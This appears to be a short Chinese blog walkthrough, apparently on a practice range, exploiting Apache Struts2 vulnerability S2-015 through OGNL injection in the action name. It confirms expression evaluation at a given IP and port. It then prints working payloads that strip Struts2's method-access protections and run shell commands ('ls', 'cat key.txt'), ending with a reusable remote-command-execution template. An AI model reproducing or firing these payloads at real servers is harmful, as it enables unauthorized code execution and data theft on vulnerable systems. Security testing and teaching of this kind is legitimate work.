【Struts2-命令-代码执行突破分析系列】S2-015
时间:2020-04-16 15:34:26
收藏:0
阅读:152
测试漏洞
http://219.153.49.228:45828/${1+2}.action
表达式进行了计算,表示漏洞存在,开始构造exp
读取当前文件夹的文件
${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls‘).getInputStream()),#q}.action
读取key.txt
${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat key.txt‘).getInputStream()),#q}.action
Exp代码:
${#context[‘xwork.MethodAccessor.denyMethodExecution‘]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess‘),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘[命令]‘).getInputStream()),#q}.action
评论(0)